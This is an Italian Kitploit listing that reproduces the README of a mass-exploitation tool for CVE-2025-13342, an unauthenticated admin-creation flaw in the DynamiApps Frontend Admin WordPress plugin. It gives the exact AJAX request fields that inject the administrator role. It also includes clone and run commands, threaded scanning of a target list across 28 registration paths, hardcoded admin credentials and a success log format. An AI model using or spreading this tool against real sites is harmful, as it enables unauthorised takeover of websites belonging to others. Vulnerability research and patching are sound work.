Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-13342 — Frontend Admin di DynamiApps <= 3.28.20 - Aggiornamento Non Autenticato di Opzioni Arbitrarie | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-13342
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin di DynamiApps <= 3.28.20 - Aggiornamento Non Autenticato di Opzioni Arbitrarie

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-13342

Frontend Admin di DynamiApps <= 3.28.20 - Aggiornamento Opzioni Arbitrarie Non Autenticato

⚡ CVE-2025-13342

Frontend Admin di DynamiApps — Creazione Admin Non Autenticata

root@kitploit:~
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS Plugin Auth

Python

◈ Vulnerabilità

CampoDettaglio
CVE IDCVE-2025-13342
Punteggio9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Versione interessataFrontend Admin di DynamiApps ≤ 3.28.20
AutenticazioneNessuna — completamente non autenticato
TipoControllo di Capacità Insufficiente + Validazione Input → Scrittura Opzioni Arbitraria
CWECWE-284 · Controllo di Accesso Improprio

Cosa succede:
Il gestore di salvataggio ActionOptions::run() non controlla né le capacità dell'utente né valida l'input prima di scrivere su wp_options. Un modulo pubblico ACF frontend diventa un canale di scrittura aperto. L'attaccante imposta users_can_register=1 e default_role=administrator, quindi registra un nuovo account che riceve automaticamente il ruolo di Amministratore.

Questo strumento salta quell'approccio a due passaggi — invia direttamente il payload del modulo creato con role=administrator iniettato nei campi di creazione dell'utente tramite acff[user][field_*], creando un account amministratore in una singola chiamata AJAX.


◈ Come Funziona l'Exploit

root@kitploit:~
1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<role_field>] = administrator
5. {"success":true}  →  admin account created
6. Log to acf_success.txt

◈ Requisiti

root@kitploit:~
requests
beautifulsoup4
colorama
rich
root@kitploit:~
pip install requests beautifulsoup4 colorama rich

◈ Installazione ed Esecuzione

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ Utilizzo

Lo strumento è interattivo. Ti verranno poste quattro domande:

root@kitploit:~
Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N

Le credenziali sono fisse internamente:

CampoValore
UsernameNxadmin1
Email[email protected]
PasswordNxAdmin_1337#KSA

◈ File dei Target

Un host per riga — schema opzionale:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

◈ Percorsi di Registrazione Scansionati

Lo strumento esamina 28 percorsi per target in ordine, fermandosi al primo modulo ACF valido:

root@kitploit:~
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ Output

FileContenuto
acf_success.txtCreazioni admin confermate riuscite

Formato:

root@kitploit:~
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

Terminale:

root@kitploit:~
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com

◈ Contatti

AutoreNxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ Dichiarazione di esclusione di responsabilità

Questo strumento è fornito solo per scopi di ricerca sulla sicurezza autorizzata e didattici.
L'autore non si assume alcuna responsabilità per qualsiasi utilizzo contro sistemi senza esplicita autorizzazione scritta del proprietario.
L'accesso non autorizzato è illegale secondo il CFAA, il CMA e leggi equivalenti in tutto il mondo.
Sei l'unico responsabile delle tue azioni.


© 2025 Nxploited · Frontend Admin di DynamiApps ≤ 3.28.20 · Risolto nella versione 3.28.21
Scarica lo strumento